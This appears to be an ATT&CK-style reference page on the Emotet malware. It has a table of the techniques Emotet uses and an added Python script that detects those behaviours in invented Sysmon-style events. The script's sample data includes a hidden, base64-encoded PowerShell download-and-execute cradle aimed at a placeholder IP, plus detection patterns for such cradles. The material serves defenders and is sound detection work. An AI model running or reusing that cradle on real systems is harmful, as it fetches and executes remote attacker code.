
S0367 Emotet

Emotet is modular malware that is primarily used as a downloader for other malware, such as TrickBot and IcedID. Emotet first emerged in June 2014 and was originally used to target the banking sector. 8

ID: S0367
Associated Names: Geodo
Type: MALWARE
Version: 1.4
Created: 25 March 2019
Last Modified: 17 January 2023

Associated Software Descriptions

Name | Description
Geodo | 12

Techniques Used

Domain | ID | Name | Use
enterprise | T1087 | Account Discovery | -
enterprise | T1087.003 | Email Account | Emotet has been observed leveraging a module that can scrape email addresses from Outlook. 316
enterprise | T1560 | Archive Collected Data | Emotet has been observed encrypting the data it collects before sending it to the C2 server. 14
enterprise | T1547 | Boot or Logon Autostart Execution | -
enterprise | T1547.001 | Registry Run Keys / Startup Folder | Emotet has been observed adding a value for the downloaded payload under the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence. 11137
enterprise | T1110 | Brute Force | -
enterprise | T1110.001 | Password Guessing | Emotet has been observed using a hard-coded list of passwords to brute-force user accounts. 10111363
enterprise | T1059 | Command and Scripting Interpreter | -
enterprise | T1059.001 | PowerShell | Emotet has used PowerShell to retrieve the malicious payload and to download additional resources such as Mimikatz. 11127415
enterprise | T1059.003 | Windows Command Shell | Emotet has used cmd.exe to run a PowerShell script. 7
enterprise | T1059.005 | Visual Basic | Emotet has sent Microsoft Word documents with embedded macros that invoke scripts to download additional payloads. 11112715
enterprise | T1543 | Create or Modify System Process | -
enterprise | T1543.003 | Windows Service | Emotet has been observed creating new services to maintain persistence. 136
enterprise | T1555 | Credentials from Password Stores | -
enterprise | T1555.003 | Credentials from Web Browsers | Emotet has been observed dropping browser password grabber modules. 1216
enterprise | T1114 | Email Collection | -
enterprise | T1114.001 | Local Email Collection | Emotet has been observed leveraging a module that scrapes email data from Outlook. 3
enterprise | T1573 | Encrypted Channel | -
enterprise | T1573.002 | Asymmetric Cryptography | Emotet is known to use RSA keys for encrypting C2 traffic. 12
enterprise | T1041 | Exfiltration Over C2 Channel | Emotet has been seen exfiltrating system information stored within cookies sent in an HTTP GET request back to its C2 servers. 12
enterprise | T1210 | Exploitation of Remote Services | Emotet has been seen exploiting SMB with the EternalBlue exploit (MS17-010) to achieve lateral movement and propagation. 111364
enterprise | T1040 | Network Sniffing | Emotet has been observed hooking network APIs to monitor network traffic. 8
enterprise | T1571 | Non-Standard Port | Emotet has used HTTP over ports such as 20, 22, 7080, and 50000, in addition to the ports commonly associated with HTTP/S. 1
enterprise | T1027 | Obfuscated Files or Information | -
enterprise | T1027.002 | Software Packing | Emotet has used custom packers to protect its payloads. 12
enterprise | T1027.010 | Command Obfuscation | Emotet has obfuscated the macros in its malicious documents to hide the URLs hosting the malware, the cmd.exe arguments, and the PowerShell scripts. 112717
enterprise | T1003 | OS Credential Dumping | -
enterprise | T1003.001 | LSASS Memory | Emotet has been observed dropping password grabber modules, including Mimikatz. 12
enterprise | T1566 | Phishing | -
enterprise | T1566.001 | Spearphishing Attachment | Emotet has been delivered by phishing emails containing attachments. 210111311271516
enterprise | T1566.002 | Spearphishing Link | Emotet has been delivered by phishing emails containing links. 892101113117
enterprise | T1057 | Process Discovery | Emotet has been observed enumerating local processes. 18
enterprise | T1055 | Process Injection | -
enterprise | T1055.001 | Dynamic-link Library Injection | Emotet has been observed injecting into Explorer.exe and other processes. 7813
enterprise | T1021 | Remote Services | -
enterprise | T1021.002 | SMB/Windows Admin Shares | Emotet leverages the Admin$ share for lateral movement once the local admin password has been brute-forced. 10
enterprise | T1053 | Scheduled Task/Job | -
enterprise | T1053.005 | Scheduled Task | Emotet has maintained persistence through a scheduled task. 13
enterprise | T1552 | Unsecured Credentials | -
enterprise | T1552.001 | Credentials In Files | Emotet has been observed leveraging a module that retrieves passwords stored on the system for the currently logged-on user. 133
enterprise | T1204 | User Execution | -
enterprise | T1204.001 | Malicious Link | Emotet has relied upon users clicking on a malicious link delivered through spearphishing. 815
enterprise | T1204.002 | Malicious File | Emotet has relied upon users opening a malicious attachment delivered through spearphishing. 81516
enterprise | T1078 | Valid Accounts | -
enterprise | T1078.003 | Local Accounts | Emotet can brute-force a local admin password, then use it to facilitate lateral movement. 10
enterprise | T1047 | Windows Management Instrumentation | Emotet has used WMI to execute powershell.exe. 15
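Several rows in the table above describe host behaviours that are directly observable in endpoint telemetry: a Word document handing off to cmd.exe and PowerShell (T1059.005, T1059.003, T1059.001), WMI launching powershell.exe (T1047), a Run-key value pointing at the dropped payload (T1547.001), and HTTP C2 on ports 20, 22, 7080 or 50000 (T1571). The script below is an added example written for this page, not ATT&CK content or Emotet code. It runs simple detection rules over a constructed, Sysmon-style event list (process creation, network connection and registry value set; all hosts, paths, SIDs and the base64 payload are invented) and decodes the -EncodedCommand argument so the rule can inspect the actual PowerShell rather than the base64 blob. The user-writable-directory check on the port rule is an assumption made here to keep SSH and FTP clients from triggering it.

```python
"""Detection rules for Emotet host behaviours listed in the ATT&CK table above,
run over constructed Sysmon-style events. Added example; not ATT&CK or Emotet code."""
import base64
import re

# --- constructed sample telemetry (not real logs) -------------------------------------
# Field names loosely follow Sysmon Event ID 1 (process create), 3 (network connect)
# and 13 (registry value set). Hosts, paths and SIDs are invented for this example.
def encode_ps_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it: UTF-16LE, base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

DOWNLOADER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:7080/a.php')"
DROPPER = r"C:\Users\alice\AppData\Local\Temp\683.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -w hidden -enc " + encode_ps_command(DOWNLOADER)},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc " + encode_ps_command(DOWNLOADER)},
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -e " + encode_ps_command("Start-Sleep 1")},
    {"id": 3, "image": DROPPER, "dst_ip": "203.0.113.10", "dst_port": 7080},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "198.51.100.7", "dst_port": 443},
    {"id": 3, "image": r"C:\Program Files\PuTTY\putty.exe",
     "dst_ip": "198.51.100.9", "dst_port": 22},          # benign SSH, must not alert
    {"id": 13, "image": DROPPER, "details": DROPPER,
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
               r"\Software\Microsoft\Windows\CurrentVersion\Run\683"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# --- detection rules -------------------------------------------------------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
NONSTD_HTTP_PORTS = {20, 22, 7080, 50000}            # ports named in the T1571 row
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Users\\Public|ProgramData)\\", re.I)
DOWNLOAD_MARKERS = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|"
                              r"\bIEX\b|Invoke-Expression", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e and -enc are the usual ones.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return a list of (technique, description) alerts for the behaviours in the table."""
    alerts = []
    for ev in events:
        img = basename(ev["image"])
        if ev["id"] == 1:
            parent = basename(ev["parent"])
            # Macro-laden Office document handing off to a script host (T1059.005 -> .003/.001).
            if parent in OFFICE_APPS and img in SHELLS:
                alerts.append(("T1059.005", f"{parent} spawned {img}"))
            # WMI used to launch PowerShell (T1047): the parent is WmiPrvSE.exe, not a shell.
            if parent == "wmiprvse.exe" and img in POWERSHELL:
                alerts.append(("T1047", "WmiPrvSE.exe spawned PowerShell"))
            # Encoded PowerShell whose decoded body is a download cradle (T1059.001).
            if img in POWERSHELL:
                script = decode_encoded_command(ev["cmdline"])
                if script and DOWNLOAD_MARKERS.search(script):
                    alerts.append(("T1059.001", f"encoded download cradle: {script}"))
        elif ev["id"] == 3:
            # Outbound connection on a port from the T1571 row. Ports 20/22 alone are noisy,
            # so (assumption) also require the initiating binary to live in a user-writable path.
            if ev["dst_port"] in NONSTD_HTTP_PORTS and USER_WRITABLE.search(ev["image"]):
                alerts.append(("T1571", f"{img} -> {ev['dst_ip']}:{ev['dst_port']}"))
        elif ev["id"] == 13:
            # Run-key value pointing at a binary in a user-writable directory (T1547.001).
            if (re.search(r"\\CurrentVersion\\Run\\", ev["target"], re.I)
                    and USER_WRITABLE.search(ev["details"])):
                alerts.append(("T1547.001", f"Run key {ev['target']} -> {ev['details']}"))
    return alerts


if __name__ == "__main__":
    for technique, detail in detect(SAMPLE_EVENTS):
        print(f"[{technique}] {detail}")
```

Run as-is, the sample stream produces five alerts (one each for T1059.005, T1059.001, T1047, T1571 and T1547.001); the Firefox, PuTTY and Notepad events stay silent. In production the parent/child and registry rules map to Sysmon or EDR process-tree data, and the decoded command line is what you would hand to a sandbox or a string-matching rule, since the base64 form defeats plain keyword searches.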

Groups That Use This Software

ID | Name | References
G0102 | Wizard Spider | 1920

References


  1. Brumaghin, E. (2019, January 15). Emotet re-emerges after the holidays. Retrieved March 25, 2019.
  2. CIS. (2017, April 28). Emotet Changes TTPs and Arrives in United States. Retrieved January 17, 2019.
  3. CIS. (2018, December 12). MS-ISAC Security Primer - Emotet. Retrieved March 25, 2019.
  4. Donohue, B. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.
  5. ESET. (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.
  6. Mclellan, M. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.
  7. Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.
  8. Salvio, J. (2014, June 27). New Banking Malware Uses Network Sniffing for Data Theft. Retrieved March 25, 2019.
  9. Shulmin, A. (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.
  10. Smith, A. (2017, December 22). Protect your network from Emotet Trojan with Malwarebytes Endpoint Security. Retrieved January 17, 2019.
  11. Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.
  12. Trend Micro. (2019, January 16). Exploring Emotet's Activities. Retrieved March 25, 2019.
  13. US-CERT. (2018, July 20). Alert (TA18-201A) Emotet Malware. Retrieved March 25, 2019.
  14. Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant - Part 1. Retrieved April 1, 2019.
  15. Lee, S. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.
  16. Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.
  17. Perez, D. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019.
  18. ASEC. (2017). ASEC REPORT VOL.88. Retrieved April 16, 2019.
  19. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
  20. Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They're back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.